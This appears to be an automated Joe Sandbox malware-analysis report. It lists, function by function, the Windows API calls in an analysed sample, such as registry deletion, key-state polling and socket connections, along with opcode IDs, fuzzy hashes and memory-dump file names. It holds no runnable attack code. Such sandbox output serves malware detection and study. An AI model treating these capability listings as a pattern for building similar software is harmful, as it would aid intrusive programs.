                                                                                              • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                              APIs
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConnectRegistry_memmove_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 15295421-0
                                                                                              • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                              • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                              • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                              • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                              APIs
                                                                                              • GetCursorPos.USER32(?), ref: 004563A6
                                                                                              • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                              • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                              • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3539004672-0
                                                                                              • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                              • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                              • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                              • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                              APIs
                                                                                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                              • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 327565842-0
                                                                                              • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                              • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                              • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                              • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                              APIs
                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                              • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfile$SectionWrite$String
                                                                                              • String ID:
                                                                                              • API String ID: 2832842796-0
                                                                                              • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                              • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                              • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                              • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                              APIs
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Enum$CloseDeleteOpen
                                                                                              • String ID:
                                                                                              • API String ID: 2095303065-0
                                                                                              • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                              • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                              • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                              • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: RectWindow
                                                                                              • String ID:
                                                                                              • API String ID: 861336768-0
                                                                                              • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                              • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                              • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                              • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                              APIs
                                                                                              • SendMessageW.USER32 ref: 00449598
                                                                                                • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                              • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                              • _wcslen.LIBCMT ref: 0044960D
                                                                                              • _wcslen.LIBCMT ref: 0044961A
                                                                                              • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                              • String ID:
                                                                                              • API String ID: 1856069659-0
                                                                                              • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                              • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                              • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                              • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                              APIs
                                                                                              • GetCursorPos.USER32(?), ref: 004478E2
                                                                                              • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                              • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                              • TrackPopupMenuEx.USER32(02E964F0,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CursorMenuPopupTrack$Proc
                                                                                              • String ID:
                                                                                              • API String ID: 1300944170-0
                                                                                              • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                              • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                              • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                              • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                              • GetCursorPos.USER32(?), ref: 004479D7
                                                                                              • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                              • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                              • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1822080540-0
                                                                                              • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                              • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                              • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                              • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                              • EndPaint.USER32(?,?), ref: 00447D13
                                                                                              Similarity
                                                                                              • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                              • String ID:
                                                                                              • API String ID: 659298297-0
                                                                                              • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                              • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                              • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                              • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                              APIs
                                                                                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                • Part of subcall function 00440D98: SendMessageW.USER32(02E91B00,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                • Part of subcall function 00440D98: SendMessageW.USER32(02E91B00,000000F1,00000001,00000000), ref: 00440E9A
                                                                                              Similarity
                                                                                              • API ID: Window$EnableMessageSend$LongShow
                                                                                              • String ID:
                                                                                              • API String ID: 142311417-0
                                                                                              • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                              • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                              • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                              • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                              • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                              • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                              • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 00445879
                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                              • _wcslen.LIBCMT ref: 004458FB
                                                                                              • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                              Similarity
                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 3087257052-0
                                                                                              • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                              • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                              • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                              • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                              APIs
                                                                                                • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                              • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 245547762-0
                                                                                              • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                              • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                              • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                              • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                              APIs
                                                                                              • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                              • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                              • BeginPath.GDI32(?), ref: 0044723D
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                              Similarity
                                                                                              • API ID: Object$Select$BeginCreateDeletePath
                                                                                              • String ID:
                                                                                              • API String ID: 2338827641-0
                                                                                              • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                              • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                              • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                              • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                              • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                              Similarity
                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                              • String ID:
                                                                                              • API String ID: 2875609808-0
                                                                                              • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                              • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                              • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                              • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                              • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                              • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                              • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                              Similarity
                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3741023627-0
                                                                                              • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                              • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                              • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                              • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                              • String ID:
                                                                                              • API String ID: 4023252218-0
                                                                                              • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                              • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                              • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                              • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                              • DeleteObject.GDI32(?), ref: 00455736
                                                                                              • DeleteObject.GDI32(?), ref: 00455744
                                                                                              • DestroyIcon.USER32(?), ref: 00455752
                                                                                              • DestroyWindow.USER32(?), ref: 00455760
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1489400265-0
                                                                                              • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
